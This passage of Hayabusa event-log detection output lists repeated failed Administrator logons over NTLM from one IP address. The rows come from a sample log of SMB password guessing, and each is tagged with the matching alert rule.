NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKMLt6t01vUDDq1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYSif8ADOkC8aInB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EpmraSe2sxFVupTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VPtfy3AxXpt9D3bx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRMOrE0Ba983q0Jv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQ0nkyTAeJt3dCpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2fdsRMU9SMm1KpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3kliEPBsbsYNI7yG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gEKFGsRvvlzulxR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M6oUbT8LvS7JNCq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E4dxHwRQVR7iBWa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VRygirU257VfFcR5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6H6i0wkjvWkU6cmp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W4Nh7bYfVvx30hVF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQEsO4GpVjO5xpRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9ZlpSBwq0tLAgzm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65Piip53B1AiSBqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bh7SfuheoykW7Aym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tWdm76C4nL6tkU0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u2WEqTrg3A760Axt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyqhXspTlWwVCwA3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rkidbQJmvQr35Jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zr92VsL1YgHVehnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQP1K9rHrOyL0TOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LR783q3o34oLQLTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6NCTNhcghRGWf1qi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CVJdStLdKDbUICyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luAoVhEj1rOgZBfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OrqmovxoEEjLCaYV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AIP4mDSVhM27IAIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cym5lXDK01XuJz2b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7pYXA1Ic6BOfG31o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b722QrTSVoZGfiK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NzRFz4L7dpar794B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pLWuw9eMN9rqm0Ic | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sE7pzfiKRfOb2dH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxL1cV8OiFVRfj4I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHs8Z8XPLg58jZ1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6kRLlJt3Oxwhdgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s4kTwriHAKVsTqzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jfitpZ5ZrzBfpNf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdcU6ypEEeIAugGI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jIMfGIU1pHasO88g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHsxKEQK7CWSqprp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QkC70klP6mv8YZrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3YM3zaZk64qqq7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mOLbk23zOqQLZYZU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0tlyXqvCQJVqaB5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: npjQlHcGls5gENng | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7buinUqketmW3Ib6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rs5gYGs6JBf2yV1J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67hYMvtmbrmv5LHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtV42zBnWwRCLfJS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jnaPNm28FvbFfM8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCEvKO14gPFHAZIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iJJyXCm1YOI2uIAS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MNAScx4qMKxCJQdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKTHsNA29ZnPHCHQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CjvAb3sjN0PM8my4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wYQ6HuRSMh8DXzMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZgejUxgojDE1kR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2L4yO411OUnkRGWQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O3mGCNGFML75P7w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6CBslPz31UACz0wR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4Y8V0wB6unpmFXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXSbx81GD6dYgHtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWbnppJfJ0Ll9oLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoUjizV5iXImPGTe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHNG9oylnT46IObg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LUeAisNPQULjD2t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2sB5MlRw4Ox1OWdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WaklWtKd8QByH8M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nzvyy6CUk43SVxZW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xeolvnD92qP1dJPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDvRwPbu6yQH2pEf | IP Addr: 192.168.198.149 | AuthPackage: 